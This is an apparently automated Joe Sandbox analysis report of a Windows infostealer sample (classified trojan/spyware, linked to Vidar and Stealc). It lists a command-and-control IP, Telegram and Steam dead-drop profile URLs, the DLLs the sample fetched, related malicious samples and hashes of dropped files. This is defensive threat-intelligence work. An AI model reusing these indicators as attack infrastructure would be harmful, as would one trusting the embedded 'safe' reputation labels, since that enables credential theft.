https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://store.steampowered.com/points/shop/	Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	DGDAEHCB.11.dr	false		high
https://37.27.87.155HDHIDGIEBGIJEHIJKFIIition:	Spice.pif, 0000000B.00000002.2622802244.0000000004981000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://37.27.87.155AAKKE	Spice.pif, 0000000B.00000002.2622802244.0000000004981000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://steamcommunity.com/profiles/76561199677575543Mozilla/5.0	Spice.pif, 0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621375005.0000000001820000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180158067.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621300072.00000000017A0000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621187844.0000000001751000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180218902.00000000016C9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	0dN59ZIkEM.exe	false		high
https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://www.ecosia.org/newtab/	DGDAEHCB.11.dr	false		high
https://store.steampowered.com/privacy_agreement/	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://37.27.87.155VWXYZ12345678900)	Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://www.google.com/recaptcha/	Spice.pif, 0000000B.00000002.2621187844.0000000001790000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=c4Un	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=3gW5J8_jG_Yc&amp	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://store.steampowered.com/about/	76561199677575543[1].htm.11.dr	false		high
https://steamcommunity.com/my/wishlist/	Spice.pif, 0000000B.00000002.2620952300.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://t.me/	Spice.pif, 0000000B.00000003.2179892773.00000000016C9000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180038050.0000000001821000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180269405.00000000017C8000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180478356.0000000001821000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180335897.00000000017C9000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180269405.00000000017A1000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2179949168.00000000016C9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t.me/snsb82At	Spice.pif, 0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621375005.0000000001820000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180158067.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621300072.00000000017A0000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621187844.0000000001751000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180218902.00000000016C9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://37.27.87.155/;	Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=EyWBqDQS-6	Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://help.steampowered.com/en/	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://steamcommunity.com/market/	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://store.steampowered.com/news/	Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://37.27.87.155/freebl3.dll(e	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	DGDAEHCB.11.dr	false		high
http://store.steampowered.com/subscriber_agreement/	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://steamcommunity.com/discussions/	Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://steamcommunity.com/O	Spice.pif, 0000000B.00000002.2620952300.00000000016B7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/stats/	Spice.pif, 0000000B.00000002.2620952300.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://37.27.87.155CAKJE	Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://store.steampowered.com/steam_refunds/	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v	Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	DGDAEHCB.11.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://steamcommunity.com/workshop/	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://store.steampowered.com/legal/	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://t.me/snsb82	Spice.pif, 0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621375005.0000000001820000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180158067.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621300072.00000000017A0000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621187844.0000000001751000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180218902.00000000016C9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.sqlite.org/copyright.html.	Spice.pif, 0000000B.00000002.2627170786.000000001024D000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, sqln[1].dll.11.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=	76561199677575543[1].htm.11.dr	false		high
https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	DGDAEHCB.11.dr	false		high
https://37.27.87.155/o	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://37.27.87.155/p	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://37.27.87.155KKKEH	Spice.pif, 0000000B.00000002.2622802244.0000000004981000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli	Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high
https://recaptcha.net	Spice.pif, 0000000B.00000002.2621187844.0000000001790000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://37.27.87.155	76561199677575543[1].htm.11.dr	false	11%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://store.steampowered.com/	76561199677575543[1].htm.11.dr	false		high
https://37.27.87.155FBGIIIEBGDGDAKJKKKEBition:	Spice.pif, 0000000B.00000002.2622802244.0000000004981000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://steamcommunity.com/profiles/76561199677575543j	Spice.pif, 0000000B.00000002.2620952300.00000000016B7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	DGDAEHCB.11.dr	false		high
https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	Spice.pif, 0000000B.00000002.2620952300.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
37.27.87.155	unknown	Iran (ISLAMIC Republic Of)		39232	UNINETAZ	false
23.7.115.52	steamcommunity.com	United States		14080	TelmexColombiaSACO	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1433839
Start date and time:	2024-04-30 07:41:35 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	0dN59ZIkEM.exe renamed because original name is a hash value
Original Sample Name:	1a6e4128750535604181321ce27c3084.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@22/39@2/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 100 Number of non-executed functions: 292
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:43:12	API Interceptor	271x Sleep call for process: Spice.pif modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
37.27.87.155	file.exe	Get hash	malicious	LummaC, PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	qk9TaBBxh8.exe	Get hash	malicious	LummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	SecuriteInfo.com.Win64.Evo-gen.32634.31069.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse
	file.exe	Get hash	malicious	Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
steamcommunity.com	file.exe	Get hash	malicious	Vidar	Browse	23.210.138.105
	file.exe	Get hash	malicious	LummaC, PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRAT	Browse	23.210.138.105
	file.exe	Get hash	malicious	Vidar	Browse	23.210.138.105
	file.exe	Get hash	malicious	Vidar	Browse	104.105.90.131
	file.exe	Get hash	malicious	Vidar	Browse	104.108.99.20
	file.exe	Get hash	malicious	Vidar	Browse	104.108.99.20
	file.exe	Get hash	malicious	Vidar	Browse	104.102.129.112
	file.exe	Get hash	malicious	Vidar	Browse	23.194.234.100
	file.exe	Get hash	malicious	Vidar	Browse	23.194.234.100
	lzShU2RYJa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	96.17.209.196

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UNINETAZ	file.exe	Get hash	malicious	LummaC, PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRAT	Browse	37.27.87.155
	file.exe	Get hash	malicious	Vidar	Browse	37.27.87.155
	file.exe	Get hash	malicious	Vidar	Browse	37.27.87.155
	SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	37.27.87.155
	file.exe	Get hash	malicious	Vidar	Browse	37.27.87.155
	qk9TaBBxh8.exe	Get hash	malicious	LummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	37.27.87.155
	file.exe	Get hash	malicious	Vidar	Browse	37.27.87.155
	SecuriteInfo.com.Win64.Evo-gen.32634.31069.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	37.27.87.155
	file.exe	Get hash	malicious	Vidar	Browse	37.27.87.155
	4XAsw9FSr5.elf	Get hash	malicious	Unknown	Browse	37.27.255.7
TelmexColombiaSACO	LfI5pQnZBu.elf	Get hash	malicious	Mirai	Browse	190.143.63.115
	f8txrlLgsG.elf	Get hash	malicious	Mirai	Browse	186.87.153.47
	98zdN8lGtk.elf	Get hash	malicious	Unknown	Browse	181.49.145.239
	8cys6Vklwy.elf	Get hash	malicious	Unknown	Browse	181.57.212.129
	sora.arm7.elf	Get hash	malicious	Mirai	Browse	181.62.19.144
	sora.arm.elf	Get hash	malicious	Mirai	Browse	190.85.145.166
	3P4acRdms1.elf	Get hash	malicious	Mirai	Browse	190.143.63.102
	x1b5bmJgLm.elf	Get hash	malicious	Unknown	Browse	186.86.44.84
	ZcOjro0Chh.elf	Get hash	malicious	Mirai	Browse	181.54.154.16
	dwn1cGHIbV.elf	Get hash	malicious	Mirai	Browse	181.61.167.31

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
51c64c77e60f3980eea90869b68c58a8	file.exe	Get hash	malicious	Vidar	Browse	37.27.87.155
	file.exe	Get hash	malicious	LummaC, PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRAT	Browse	37.27.87.155
	SecuriteInfo.com.Win32.DropperX-gen.990.17898.exe	Get hash	malicious	CobaltStrike	Browse	37.27.87.155
	SecuriteInfo.com.Win32.DropperX-gen.990.17898.exe	Get hash	malicious	CobaltStrike	Browse	37.27.87.155
	file.exe	Get hash	malicious	Vidar	Browse	37.27.87.155
	file.exe	Get hash	malicious	Vidar	Browse	37.27.87.155
	sdfYc98GO4.exe	Get hash	malicious	CobaltStrike	Browse	37.27.87.155
	file.exe	Get hash	malicious	Vidar	Browse	37.27.87.155
	file.exe	Get hash	malicious	Vidar	Browse	37.27.87.155
	file.exe	Get hash	malicious	Vidar	Browse	37.27.87.155
37f463bf4616ecd445d4a1937da06e19	T0gjOTzwJb.exe	Get hash	malicious	Djvu	Browse	23.7.115.52
	34cFFMVY3B.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	23.7.115.52
	file.exe	Get hash	malicious	Vidar	Browse	23.7.115.52
	z39103_PN-EN-1090-1_A1_2012P.exe	Get hash	malicious	GuLoader, Remcos	Browse	23.7.115.52
	rCW_00402902400429.bat	Get hash	malicious	FormBook, GuLoader	Browse	23.7.115.52
	z6FORMATOPROVEEDORESMETAX.exe	Get hash	malicious	GuLoader, Remcos	Browse	23.7.115.52
	z77EU17439-FT-MILKYLUXGOUDAMILD.exe	Get hash	malicious	GuLoader, Remcos	Browse	23.7.115.52
	beta.dll.dll	Get hash	malicious	Latrodectus	Browse	23.7.115.52
	Document_g55_79a057639-91h49176a6220-1759n0.js	Get hash	malicious	Latrodectus	Browse	23.7.115.52
	bim.msi	Get hash	malicious	Latrodectus	Browse	23.7.115.52

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\HCAEGCBFHJDG\mozglue.dll	34cFFMVY3B.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	HFtuDDkdi6.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	A4eSWqbQPf.exe	Get hash	malicious	Mars Stealer, RedLine, SectopRAT, Stealc, Vidar	Browse
	N3MZMKV5GN.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	nJGNa9kHJf.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	7PFj8ZyNTr.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	HpsVE4Pwxn.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	u7p2rff5aP.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
C:\ProgramData\HCAEGCBFHJDG\freebl3.dll	34cFFMVY3B.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	HFtuDDkdi6.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	A4eSWqbQPf.exe	Get hash	malicious	Mars Stealer, RedLine, SectopRAT, Stealc, Vidar	Browse
	N3MZMKV5GN.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	nJGNa9kHJf.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	7PFj8ZyNTr.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	HpsVE4Pwxn.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	u7p2rff5aP.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse

Created / dropped Files

C:\ProgramData\BFHJJJDAFBKEBGDGHCGDBKJECF

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8475592208333753
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
MD5:	BE99679A2B018331EACD3A1B680E3757
SHA1:	6E6732E173C91B0C3287AB4B161FE3676D33449A
SHA-256:	C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
SHA-512:	9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CBKJJJDH

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
